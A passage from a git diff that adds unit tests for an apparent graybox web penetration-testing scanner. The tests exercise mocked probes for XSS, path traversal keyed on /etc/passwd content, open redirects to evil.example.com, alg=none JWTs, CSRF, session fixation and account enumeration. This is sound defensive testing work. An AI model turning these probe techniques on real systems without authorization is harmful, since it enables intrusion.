session.get.return_value = resp + + probe._test_ssrf() + api7 = [f for f in probe.findings if f.scenario_id == "PT-API7-01"] + self.assertEqual(len(api7), 0) + + +class TestLoginInjection(unittest.TestCase): + + def test_login_injection_no_reflection(self): + """No reflection → not_vulnerable.""" + probe = _make_probe() + anon = MagicMock() + anon.get.return_value = _mock_response( + text='
    ', + ) + anon.post.return_value = _mock_response(text="Invalid credentials") + anon.close = MagicMock() + probe.auth.make_anonymous_session.return_value = anon + probe.auth.detected_csrf_field = None + + probe._test_login_injection() + clean = [f for f in probe.findings if f.scenario_id == "PT-A05-01" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + +class TestAuthenticatedInjection(unittest.TestCase): + + def test_authenticated_injection(self): + """Payload reflected in form → finding.""" + probe = _make_probe(discovered_forms=["/search/"]) + session = probe.auth.official_session + # GET the form page → has text input + session.get.return_value = _mock_response( + text='
    ', + ) + # POST with payload → reflection + session.post.return_value = _mock_response( + text='Results for: ', + ) + + probe._test_authenticated_injection() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A03-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + + def test_authenticated_injection_no_forms(self): + """No forms → skip.""" + probe = _make_probe(discovered_forms=[]) + probe._test_authenticated_injection() + self.assertEqual(len(probe.findings), 0) + + def test_authenticated_injection_skips_login(self): + """Login form excluded from authenticated injection.""" + probe = _make_probe( + discovered_forms=["/auth/login/", "/search/"], + login_path="/auth/login/", + ) + session = probe.auth.official_session + # Only /search/ should be tested + session.get.return_value = _mock_response( + text='
    ', + ) + session.post.return_value = _mock_response(text="No reflection here") + + probe._test_authenticated_injection() + # Should have tested 1 form (not 2) + # Check that no vulnerable finding for login form + for f in probe.findings: + if f.status == "vulnerable": + for ev in f.evidence: + self.assertNotIn("/auth/login/", ev) + + +class TestStoredXss(unittest.TestCase): + + def test_stored_xss_detected(self): + """Canary reflected unescaped → vulnerable.""" + probe = _make_probe( + discovered_forms=["/comments/"], + allow_stateful=True, + ) + session = probe.auth.official_session + + # GET form page with text input + form_html = '
    ' + # On readback, the canary is reflected unescaped + call_count = [0] + + def mock_get(url, **kwargs): + call_count[0] += 1 + if call_count[0] == 1: + return _mock_response(text=form_html) + else: + # Readback — extract the canary from the POST + # We need to include both the canary and the full payload + return _mock_response( + text="
    XSS-CANARY-12345678
    ", + ) + + session.get.side_effect = mock_get + session.post.return_value = _mock_response(text="Saved") + + # Patch uuid to get predictable canary + import unittest.mock + with unittest.mock.patch("uuid.uuid4") as mock_uuid: + mock_uuid.return_value.hex = "12345678abcdef01" + probe._test_stored_xss() + + vuln = [f for f in probe.findings if f.scenario_id == "PT-A03-02" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-79", vuln[0].cwe) + + def test_stored_xss_escaped(self): + """Canary HTML-encoded → not_vulnerable.""" + probe = _make_probe( + discovered_forms=["/comments/"], + allow_stateful=True, + ) + session = probe.auth.official_session + + form_html = '
    ' + call_count = [0] + + def mock_get(url, **kwargs): + call_count[0] += 1 + if call_count[0] == 1: + return _mock_response(text=form_html) + else: + return _mock_response(text="
    <img src=x>
    ") + + session.get.side_effect = mock_get + session.post.return_value = _mock_response(text="Saved") + + probe._test_stored_xss() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A03-02" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 0) + clean = [f for f in probe.findings if f.scenario_id == "PT-A03-02" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_stored_xss_skips_login(self): + """Login/logout forms excluded.""" + probe = _make_probe( + discovered_forms=["/auth/login/", "/auth/logout/"], + allow_stateful=True, + login_path="/auth/login/", + logout_path="/auth/logout/", + ) + + probe._test_stored_xss() + # No forms tested → no findings + self.assertEqual(len(probe.findings), 0) + + def test_stored_xss_gated(self): + """Skipped when allow_stateful=False → emits inconclusive.""" + probe = _make_probe( + discovered_forms=["/comments/"], + allow_stateful=False, + ) + + # The gating is in run(), not _test_stored_xss directly + # We need to call run() and check it emits the skip finding + # Set up minimal mocks for other probes that run() calls + anon = MagicMock() + anon.get.return_value = _mock_response(text="no reflection") + anon.post.return_value = _mock_response(text="no reflection") + anon.close = MagicMock() + probe.auth.make_anonymous_session.return_value = anon + + findings = probe.run() + skip = [f for f in findings if f.scenario_id == "PT-A03-02" and f.status == "inconclusive"] + self.assertEqual(len(skip), 1) + self.assertIn("stateful_probes_disabled=True", skip[0].evidence) + + +class TestOpenRedirect(unittest.TestCase): + + def test_open_redirect_detected(self): + """Redirect to evil domain → vulnerable/MEDIUM.""" + probe = _make_probe() + session = probe.auth.official_session + + # Response: 302 redirect to evil.example.com + redirect_resp = _mock_response(status=302, text="") + redirect_resp.headers["Location"] = "//evil.example.com" + session.get = MagicMock(return_value=redirect_resp) + + probe._test_open_redirect() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A01-04" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "MEDIUM") + self.assertIn("CWE-601", vuln[0].cwe) + + def test_open_redirect_safe(self): + """No redirect → not_vulnerable.""" + probe = _make_probe() + session = probe.auth.official_session + session.get = MagicMock(return_value=_mock_response(status=200, text="Normal page")) + + probe._test_open_redirect() + clean = [f for f in probe.findings if f.scenario_id == "PT-A01-04" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_open_redirect_internal_redirect(self): + """Redirect to same domain → not vulnerable.""" + probe = _make_probe() + session = probe.auth.official_session + + redirect_resp = _mock_response(status=302, text="") + redirect_resp.headers["Location"] = "/dashboard/" + session.get = MagicMock(return_value=redirect_resp) + + probe._test_open_redirect() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A01-04" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 0) + + +class TestPathTraversal(unittest.TestCase): + + def test_path_traversal_detected(self): + """/etc/passwd content in response → vulnerable/HIGH.""" + probe = _make_probe() + probe.discovered_routes = ["/download/"] + session = probe.auth.official_session + + normal_resp = _mock_response(status=200, text="Normal content") + passwd_resp = _mock_response( + status=200, + text="root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin\n", + ) + + call_count = [0] + def mock_get(url, **kwargs): + call_count[0] += 1 + params = kwargs.get("params", {}) + for v in params.values(): + if "etc/passwd" in str(v): + return passwd_resp + return normal_resp + + session.get = MagicMock(side_effect=mock_get) + + probe._test_path_traversal() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A03-03" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-22", vuln[0].cwe) + + def test_path_traversal_safe(self): + """No file content markers → not_vulnerable.""" + probe = _make_probe() + probe.discovered_routes = ["/page/"] + session = probe.auth.official_session + session.get = MagicMock(return_value=_mock_response(status=200, text="Safe page content")) + + probe._test_path_traversal() + clean = [f for f in probe.findings if f.scenario_id == "PT-A03-03" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_path_traversal_no_session(self): + """No official session → skip.""" + probe = _make_probe(official_session=None) + probe.auth.official_session = None + probe._test_path_traversal() + self.assertEqual(len(probe.findings), 0) + + +class TestCapabilities(unittest.TestCase): + + def test_capabilities(self): + """InjectionProbes declares correct capabilities.""" + self.assertTrue(InjectionProbes.requires_auth) + self.assertFalse(InjectionProbes.requires_regular_session) + self.assertFalse(InjectionProbes.is_stateful) + + def test_all_findings_are_graybox(self): + """All findings are GrayboxFinding.""" + probe = _make_probe(discovered_forms=["/search/"]) + session = probe.auth.official_session + session.get.return_value = _mock_response( + text='
    ', + ) + session.post.return_value = _mock_response(text="safe") + + probe._test_authenticated_injection() + for f in probe.findings: + self.assertIsInstance(f, GrayboxFinding) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_probes_misconfig.py b/extensions/business/cybersec/red_mesh/tests/test_probes_misconfig.py new file mode 100644 index 00000000..68a36200 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_probes_misconfig.py @@ -0,0 +1,413 @@ +"""Tests for MisconfigProbes.""" + +import base64 +import json +import unittest +from unittest.mock import MagicMock, PropertyMock +from http.cookiejar import Cookie + +from extensions.business.cybersec.red_mesh.graybox.probes.misconfig import MisconfigProbes +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.models.target_config import ( + GrayboxTargetConfig, MisconfigConfig, BusinessLogicConfig, WorkflowEndpoint, +) + + +def _mock_response(status=200, text="", headers=None, content_type="text/html"): + resp = MagicMock() + resp.status_code = status + resp.text = text + h = {"content-type": content_type} + if headers: + h.update(headers) + resp.headers = h + return resp + + +def _make_probe(debug_paths=None, workflow_endpoints=None, + official_session=None, anon_session=None, + discovered_forms=None, login_path="/auth/login/"): + misconfig = MisconfigConfig(debug_paths=debug_paths or ["/debug/"]) + business = BusinessLogicConfig( + workflow_endpoints=workflow_endpoints or [], + ) + cfg = GrayboxTargetConfig( + misconfig=misconfig, + business_logic=business, + login_path=login_path, + ) + auth = MagicMock() + auth.official_session = official_session + auth.anon_session = anon_session or MagicMock() + safety = MagicMock() + safety.throttle = MagicMock() + + probe = MisconfigProbes( + target_url="http://testapp.local:8000", + auth_manager=auth, + target_config=cfg, + safety=safety, + discovered_forms=discovered_forms or [], + ) + return probe + + +class TestDebugExposure(unittest.TestCase): + + def test_debug_exposure(self): + """Debug endpoint returns 200 with body → vulnerable.""" + probe = _make_probe(debug_paths=["/debug/config/"]) + session = probe.auth.anon_session + session.get.return_value = _mock_response( + status=200, text="DEBUG_MODE=True SECRET_KEY=xxx" + "x" * 50, + ) + + probe._test_debug_exposure() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A02-01" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + + def test_debug_not_found(self): + """Debug endpoint returns 404 → not_vulnerable.""" + probe = _make_probe(debug_paths=["/debug/config/"]) + session = probe.auth.anon_session + session.get.return_value = _mock_response(status=404, text="Not Found") + + probe._test_debug_exposure() + clean = [f for f in probe.findings if f.scenario_id == "PT-A02-01" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + +class TestCors(unittest.TestCase): + + def test_cors_wildcard(self): + """Access-Control-Allow-Origin: * → vulnerable.""" + probe = _make_probe() + session = probe.auth.anon_session + session.get.return_value = _mock_response( + headers={"Access-Control-Allow-Origin": "*"}, + ) + + probe._test_cors() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A02-02" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "MEDIUM") + + +class TestSecurityHeaders(unittest.TestCase): + + def test_security_headers_missing(self): + """Missing X-Frame-Options etc. → vulnerable.""" + probe = _make_probe() + session = probe.auth.anon_session + session.get.return_value = _mock_response(headers={}) + + probe._test_security_headers() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A02-03" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertIn("X-Frame-Options", vuln[0].evidence[0]) + + +class TestCookieAttributes(unittest.TestCase): + + def _make_cookie(self, name="sessionid", secure=False, httponly=False, samesite=None): + cookie = MagicMock() + cookie.name = name + cookie.secure = secure + cookie.has_nonstandard_attr = MagicMock(return_value=httponly) + cookie.get_nonstandard_attr = MagicMock(return_value=samesite) + return cookie + + def test_cookie_insecure(self): + """Missing Secure/HttpOnly → vulnerable.""" + session = MagicMock() + session.cookies = [self._make_cookie(secure=False, httponly=False)] + probe = _make_probe(official_session=session) + + probe._test_cookie_attributes() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A02-04" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + + +class TestCsrfBypass(unittest.TestCase): + + def test_csrf_bypass_no_token(self): + """POST accepted without CSRF → vulnerable.""" + session = MagicMock() + session.post.return_value = _mock_response(status=200, text="Success") + probe = _make_probe( + official_session=session, + workflow_endpoints=[WorkflowEndpoint(path="/api/transfer/")], + ) + + probe._test_csrf_bypass() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A02-05" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-352", vuln[0].cwe) + + def test_csrf_bypass_rejected(self): + """POST rejected (403) → not_vulnerable.""" + session = MagicMock() + session.post.return_value = _mock_response(status=403, text="CSRF token missing") + probe = _make_probe( + official_session=session, + workflow_endpoints=[WorkflowEndpoint(path="/api/transfer/")], + ) + + probe._test_csrf_bypass() + clean = [f for f in probe.findings if f.scenario_id == "PT-A02-05" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_csrf_bypass_skips_login(self): + """Login form is not tested for CSRF.""" + session = MagicMock() + session.post.return_value = _mock_response(status=200, text="OK") + probe = _make_probe( + official_session=session, + discovered_forms=["/auth/login/", "/profile/edit/"], + login_path="/auth/login/", + ) + + probe._test_csrf_bypass() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A02-05" and f.status == "vulnerable"] + # Only /profile/edit/ should be tested, not /auth/login/ + if vuln: + for ev in vuln[0].evidence: + if "endpoints_without_csrf" in ev: + self.assertNotIn("/auth/login/", ev) + + +class TestSessionToken(unittest.TestCase): + + def _make_jwt(self, alg="none", payload=None, signature=""): + header = base64.urlsafe_b64encode(json.dumps({"alg": alg}).encode()).rstrip(b"=").decode() + body = base64.urlsafe_b64encode(json.dumps(payload or {}).encode()).rstrip(b"=").decode() + return f"{header}.{body}.{signature}" + + def test_session_token_jwt_alg_none(self): + """alg=none JWT → vulnerable.""" + jwt = self._make_jwt(alg="none") + session = MagicMock() + session.cookies.get_dict.return_value = {"token": jwt} + probe = _make_probe(official_session=session) + + probe._test_session_token() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A02-06" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + + def test_session_token_short(self): + """Short session ID → inconclusive.""" + session = MagicMock() + session.cookies.get_dict.return_value = {"sid": "abc123"} + probe = _make_probe(official_session=session) + + probe._test_session_token() + inc = [f for f in probe.findings if f.scenario_id == "PT-A02-06" and f.status == "inconclusive"] + self.assertEqual(len(inc), 1) + self.assertEqual(inc[0].severity, "LOW") + + def test_session_token_adequate(self): + """Normal tokens → not_vulnerable.""" + session = MagicMock() + session.cookies.get_dict.return_value = { + "sessionid": "a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4", + } + probe = _make_probe(official_session=session) + + probe._test_session_token() + clean = [f for f in probe.findings if f.scenario_id == "PT-A02-06" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + +class TestSessionFixation(unittest.TestCase): + + def _mock_cookie_jar(self, cookie_dict): + """Create a mock that behaves like a RequestsCookieJar.""" + jar = MagicMock() + jar.get_dict.return_value = cookie_dict + return jar + + def test_session_fixation_detected(self): + """Same session cookie before and after login → vulnerable/HIGH.""" + probe = _make_probe() + + # Pre-auth session: anon_session returns a cookie + anon = MagicMock() + anon.get.return_value = _mock_response(text="Login page") + anon.cookies = self._mock_cookie_jar({"sessionid": "FIXED_TOKEN_123"}) + anon.close = MagicMock() + probe.auth.make_anonymous_session.return_value = anon + + # Official session has the same cookie value + official = MagicMock() + official.cookies = self._mock_cookie_jar({"sessionid": "FIXED_TOKEN_123"}) + probe.auth.official_session = official + + probe.auth.detected_csrf_field = None + + probe._test_session_fixation() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A07-03" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "HIGH") + self.assertIn("CWE-384", vuln[0].cwe) + + def test_session_fixation_rotated(self): + """Different session cookie after login → not_vulnerable.""" + probe = _make_probe() + + anon = MagicMock() + anon.get.return_value = _mock_response(text="Login page") + anon.cookies = self._mock_cookie_jar({"sessionid": "PRE_AUTH_TOKEN"}) + anon.close = MagicMock() + probe.auth.make_anonymous_session.return_value = anon + + official = MagicMock() + official.cookies = self._mock_cookie_jar({"sessionid": "POST_AUTH_TOKEN"}) + probe.auth.official_session = official + + probe.auth.detected_csrf_field = None + + probe._test_session_fixation() + clean = [f for f in probe.findings if f.scenario_id == "PT-A07-03" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_session_fixation_no_pre_cookies(self): + """No pre-auth cookies → skip (can't test).""" + probe = _make_probe() + + anon = MagicMock() + anon.get.return_value = _mock_response(text="Login page") + anon.cookies = self._mock_cookie_jar({}) + anon.close = MagicMock() + probe.auth.make_anonymous_session.return_value = anon + probe.auth.official_session = MagicMock() + + probe._test_session_fixation() + self.assertEqual(len([f for f in probe.findings if f.scenario_id == "PT-A07-03"]), 0) + + def test_session_fixation_ignores_csrf_cookie(self): + """CSRF token cookie with same value before/after is not a fixation issue.""" + probe = _make_probe() + + anon = MagicMock() + anon.get.return_value = _mock_response(text="Login page") + anon.cookies = self._mock_cookie_jar({"csrftoken": "SAME_CSRF", "sessionid": "PRE_AUTH"}) + anon.close = MagicMock() + probe.auth.make_anonymous_session.return_value = anon + + official = MagicMock() + official.cookies = self._mock_cookie_jar({"csrftoken": "SAME_CSRF", "sessionid": "POST_AUTH"}) + probe.auth.official_session = official + + probe.auth.detected_csrf_field = "csrfmiddlewaretoken" + + probe._test_session_fixation() + # csrftoken same is fine; sessionid changed → not_vulnerable + vuln = [f for f in probe.findings if f.scenario_id == "PT-A07-03" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 0) + clean = [f for f in probe.findings if f.scenario_id == "PT-A07-03" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + +class TestAccountEnumeration(unittest.TestCase): + + def test_account_enumeration_detected(self): + """Different error messages for valid/invalid username → vulnerable.""" + probe = _make_probe() + probe.regular_username = "admin" + + session = MagicMock() + session.get.return_value = _mock_response(text='
    ') + session.close = MagicMock() + + call_count = [0] + def mock_post(url, **kwargs): + call_count[0] += 1 + data = kwargs.get("data", {}) + username = data.get("username", "") + if username == "admin": + return _mock_response( + text='
    Invalid password for this account
    ', + ) + else: + return _mock_response( + text='
    No account found with that username
    ', + ) + + session.post = MagicMock(side_effect=mock_post) + probe.auth.make_anonymous_session.return_value = session + probe.auth.detected_csrf_field = None + probe.auth.extract_csrf_value = MagicMock(return_value=None) + + probe._test_account_enumeration() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A07-04" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + self.assertEqual(vuln[0].severity, "MEDIUM") + self.assertIn("CWE-204", vuln[0].cwe) + + def test_account_enumeration_consistent(self): + """Same error messages → not_vulnerable.""" + probe = _make_probe() + probe.regular_username = "admin" + + session = MagicMock() + session.get.return_value = _mock_response(text='
    ') + session.post.return_value = _mock_response( + text='
    Invalid credentials
    ', + ) + session.close = MagicMock() + probe.auth.make_anonymous_session.return_value = session + probe.auth.detected_csrf_field = None + probe.auth.extract_csrf_value = MagicMock(return_value=None) + + probe._test_account_enumeration() + clean = [f for f in probe.findings if f.scenario_id == "PT-A07-04" and f.status == "not_vulnerable"] + self.assertEqual(len(clean), 1) + + def test_account_enumeration_status_code_diff(self): + """Different status codes for valid/invalid → vulnerable.""" + probe = _make_probe() + probe.regular_username = "admin" + + session = MagicMock() + session.get.return_value = _mock_response(text='
    ') + session.close = MagicMock() + + call_count = [0] + def mock_post(url, **kwargs): + call_count[0] += 1 + data = kwargs.get("data", {}) + if data.get("username") == "admin": + return _mock_response(status=200, text="Wrong password") + return _mock_response(status=302, text="Redirect") + + session.post = MagicMock(side_effect=mock_post) + probe.auth.make_anonymous_session.return_value = session + probe.auth.detected_csrf_field = None + probe.auth.extract_csrf_value = MagicMock(return_value=None) + + probe._test_account_enumeration() + vuln = [f for f in probe.findings if f.scenario_id == "PT-A07-04" and f.status == "vulnerable"] + self.assertEqual(len(vuln), 1) + + +class TestCapabilities(unittest.TestCase): + + def test_capabilities(self): + """MisconfigProbes declares correct capabilities.""" + self.assertFalse(MisconfigProbes.requires_auth) + self.assertFalse(MisconfigProbes.requires_regular_session) + self.assertFalse(MisconfigProbes.is_stateful) + + def test_all_findings_are_graybox(self): + """All findings are GrayboxFinding instances.""" + probe = _make_probe(debug_paths=["/debug/"]) + probe.auth.anon_session.get.return_value = _mock_response(status=404, text="x") + probe._test_debug_exposure() + for f in probe.findings: + self.assertIsInstance(f, GrayboxFinding) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_reconciliation.py b/extensions/business/cybersec/red_mesh/tests/test_reconciliation.py new file mode 100644 index 00000000..581b5564 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_reconciliation.py @@ -0,0 +1,334 @@ +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.services.config import ( + get_attestation_config, + get_graybox_budgets_config, + get_llm_agent_config, + resolve_config_block, +) +from extensions.business.cybersec.red_mesh.services.reconciliation import ( + get_distributed_job_reconciliation_config, + reconcile_job_workers, +) + + +class TestWorkerReconciliation(unittest.TestCase): + + def _make_owner(self, now=100.0, stale_timeout=30): + owner = MagicMock() + owner.time.return_value = now + owner.cfg_distributed_job_reconciliation = {"STALE_TIMEOUT": stale_timeout} + return owner + + def test_resolve_config_block_uses_defaults(self): + owner = MagicMock() + owner.cfg_distributed_job_reconciliation = None + owner.CONFIG = {} + + config = resolve_config_block( + owner, + "DISTRIBUTED_JOB_RECONCILIATION", + {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0}, + ) + + self.assertEqual(config, {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0}) + + def test_resolve_config_block_merges_partial_override(self): + owner = MagicMock() + owner.cfg_distributed_job_reconciliation = {"STARTUP_TIMEOUT": 20} + + config = resolve_config_block( + owner, + "DISTRIBUTED_JOB_RECONCILIATION", + {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0}, + ) + + self.assertEqual(config, {"STARTUP_TIMEOUT": 20, "STALE_TIMEOUT": 120.0}) + + def test_resolve_config_block_ignores_non_dict_override(self): + owner = MagicMock() + owner.cfg_distributed_job_reconciliation = "bad" + owner.CONFIG = {"DISTRIBUTED_JOB_RECONCILIATION": {"STARTUP_TIMEOUT": 25}} + + config = resolve_config_block( + owner, + "DISTRIBUTED_JOB_RECONCILIATION", + {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0}, + ) + + self.assertEqual(config, {"STARTUP_TIMEOUT": 45.0, "STALE_TIMEOUT": 120.0}) + + def test_resolve_config_block_returns_copy(self): + owner = MagicMock() + owner.cfg_distributed_job_reconciliation = None + defaults = {"STARTUP_TIMEOUT": 45.0} + + config = resolve_config_block(owner, "DISTRIBUTED_JOB_RECONCILIATION", defaults) + config["STARTUP_TIMEOUT"] = 10.0 + + self.assertEqual(defaults["STARTUP_TIMEOUT"], 45.0) + + def test_llm_agent_config_uses_defaults(self): + owner = MagicMock() + owner.cfg_llm_agent = None + owner.CONFIG = {} + + config = get_llm_agent_config(owner) + + self.assertEqual(config["ENABLED"], False) + self.assertEqual(config["TIMEOUT"], 120.0) + self.assertEqual(config["AUTO_ANALYSIS_TYPE"], "security_assessment") + + def test_llm_agent_config_merges_partial_override(self): + owner = MagicMock() + owner.cfg_llm_agent = {"ENABLED": True, "TIMEOUT": 30} + + config = get_llm_agent_config(owner) + + self.assertEqual(config["ENABLED"], True) + self.assertEqual(config["TIMEOUT"], 30.0) + self.assertEqual(config["AUTO_ANALYSIS_TYPE"], "security_assessment") + + def test_llm_agent_config_normalizes_invalid_values(self): + owner = MagicMock() + owner.cfg_llm_agent = { + "ENABLED": True, + "TIMEOUT": 0, + "AUTO_ANALYSIS_TYPE": "", + } + + config = get_llm_agent_config(owner) + + self.assertEqual(config["ENABLED"], True) + self.assertEqual(config["TIMEOUT"], 120.0) + self.assertEqual(config["AUTO_ANALYSIS_TYPE"], "security_assessment") + + def test_attestation_config_uses_defaults(self): + owner = MagicMock() + owner.cfg_attestation = None + owner.CONFIG = {} + + config = get_attestation_config(owner) + + self.assertEqual(config["ENABLED"], True) + self.assertEqual(config["PRIVATE_KEY"], "") + self.assertEqual(config["MIN_SECONDS_BETWEEN_SUBMITS"], 86400.0) + self.assertEqual(config["RETRIES"], 2) + + def test_attestation_config_merges_partial_override(self): + owner = MagicMock() + owner.cfg_attestation = {"ENABLED": False, "RETRIES": 5} + + config = get_attestation_config(owner) + + self.assertEqual(config["ENABLED"], False) + self.assertEqual(config["PRIVATE_KEY"], "") + self.assertEqual(config["MIN_SECONDS_BETWEEN_SUBMITS"], 86400.0) + self.assertEqual(config["RETRIES"], 5) + + def test_attestation_config_normalizes_invalid_values(self): + owner = MagicMock() + owner.cfg_attestation = { + "ENABLED": True, + "PRIVATE_KEY": None, + "MIN_SECONDS_BETWEEN_SUBMITS": -1, + "RETRIES": "bad", + } + + config = get_attestation_config(owner) + + self.assertEqual(config["ENABLED"], True) + self.assertEqual(config["PRIVATE_KEY"], "") + self.assertEqual(config["MIN_SECONDS_BETWEEN_SUBMITS"], 86400.0) + self.assertEqual(config["RETRIES"], 2) + + def test_graybox_budgets_config_uses_defaults(self): + owner = MagicMock() + owner.cfg_graybox_budgets = None + owner.CONFIG = {} + + config = get_graybox_budgets_config(owner) + + self.assertEqual(config["AUTH_ATTEMPTS"], 10) + self.assertEqual(config["ROUTE_DISCOVERY"], 100) + self.assertEqual(config["STATEFUL_ACTIONS"], 1) + + def test_graybox_budgets_config_merges_partial_override(self): + owner = MagicMock() + owner.cfg_graybox_budgets = {"AUTH_ATTEMPTS": 3, "STATEFUL_ACTIONS": 0} + + config = get_graybox_budgets_config(owner) + + self.assertEqual(config["AUTH_ATTEMPTS"], 3) + self.assertEqual(config["ROUTE_DISCOVERY"], 100) + self.assertEqual(config["STATEFUL_ACTIONS"], 0) + + def test_graybox_budgets_config_normalizes_invalid_values(self): + owner = MagicMock() + owner.cfg_graybox_budgets = { + "AUTH_ATTEMPTS": 0, + "ROUTE_DISCOVERY": -1, + "STATEFUL_ACTIONS": "bad", + } + + config = get_graybox_budgets_config(owner) + + self.assertEqual(config["AUTH_ATTEMPTS"], 10) + self.assertEqual(config["ROUTE_DISCOVERY"], 100) + self.assertEqual(config["STATEFUL_ACTIONS"], 1) + + def test_reconciliation_config_uses_defaults(self): + owner = MagicMock() + owner.cfg_distributed_job_reconciliation = None + owner.CONFIG = {} + + config = get_distributed_job_reconciliation_config(owner) + + self.assertEqual(config["STARTUP_TIMEOUT"], 45.0) + self.assertEqual(config["STALE_TIMEOUT"], 120.0) + self.assertEqual(config["STALE_GRACE"], 30.0) + self.assertEqual(config["MAX_REANNOUNCE_ATTEMPTS"], 3) + + def test_reconciliation_config_merges_partial_override(self): + owner = MagicMock() + owner.cfg_distributed_job_reconciliation = {"STARTUP_TIMEOUT": 20} + + config = get_distributed_job_reconciliation_config(owner) + + self.assertEqual(config["STARTUP_TIMEOUT"], 20.0) + self.assertEqual(config["STALE_TIMEOUT"], 120.0) + self.assertEqual(config["STALE_GRACE"], 30.0) + self.assertEqual(config["MAX_REANNOUNCE_ATTEMPTS"], 3) + + def test_reconciliation_config_normalizes_invalid_values(self): + owner = MagicMock() + owner.cfg_distributed_job_reconciliation = { + "STARTUP_TIMEOUT": 0, + "STALE_TIMEOUT": -1, + "STALE_GRACE": -5, + "MAX_REANNOUNCE_ATTEMPTS": "bad", + } + + config = get_distributed_job_reconciliation_config(owner) + + self.assertEqual(config["STARTUP_TIMEOUT"], 45.0) + self.assertEqual(config["STALE_TIMEOUT"], 120.0) + self.assertEqual(config["STALE_GRACE"], 30.0) + self.assertEqual(config["MAX_REANNOUNCE_ATTEMPTS"], 3) + + def test_reconcile_job_workers_marks_active_worker(self): + owner = self._make_owner() + job_specs = { + "job_id": "job-1", + "job_pass": 2, + "workers": { + "worker-A": {"start_port": 1, "end_port": 10, "assignment_revision": 3}, + }, + } + live_payloads = { + "job-1:worker-A": { + "job_id": "job-1", + "worker_addr": "worker-A", + "pass_nr": 2, + "assignment_revision_seen": 3, + "progress": 40.0, + "phase": "service_probes", + "ports_scanned": 4, + "ports_total": 10, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 100.0, + "started_at": 90.0, + "first_seen_live_at": 90.0, + "last_seen_at": 100.0, + }, + } + + reconciled = reconcile_job_workers(owner, job_specs, live_payloads=live_payloads, now=100.0) + + self.assertEqual(reconciled["worker-A"]["worker_state"], "active") + + def test_reconcile_job_workers_marks_stale_worker(self): + owner = self._make_owner(now=100.0, stale_timeout=10) + job_specs = { + "job_id": "job-1", + "job_pass": 2, + "workers": { + "worker-A": {"start_port": 1, "end_port": 10, "assignment_revision": 3}, + }, + } + live_payloads = { + "job-1:worker-A": { + "job_id": "job-1", + "worker_addr": "worker-A", + "pass_nr": 2, + "assignment_revision_seen": 3, + "progress": 40.0, + "phase": "service_probes", + "ports_scanned": 4, + "ports_total": 10, + "open_ports_found": [], + "completed_tests": [], + "updated_at": 80.0, + "started_at": 70.0, + "first_seen_live_at": 70.0, + "last_seen_at": 80.0, + }, + } + + reconciled = reconcile_job_workers(owner, job_specs, live_payloads=live_payloads, now=100.0) + + self.assertEqual(reconciled["worker-A"]["worker_state"], "stale") + + def test_reconcile_job_workers_marks_unreachable_worker(self): + owner = self._make_owner() + job_specs = { + "job_id": "job-1", + "job_pass": 2, + "workers": { + "worker-A": { + "start_port": 1, + "end_port": 10, + "assignment_revision": 3, + "terminal_reason": "unreachable", + }, + }, + } + + reconciled = reconcile_job_workers(owner, job_specs, live_payloads={}, now=100.0) + + self.assertEqual(reconciled["worker-A"]["worker_state"], "unreachable") + + def 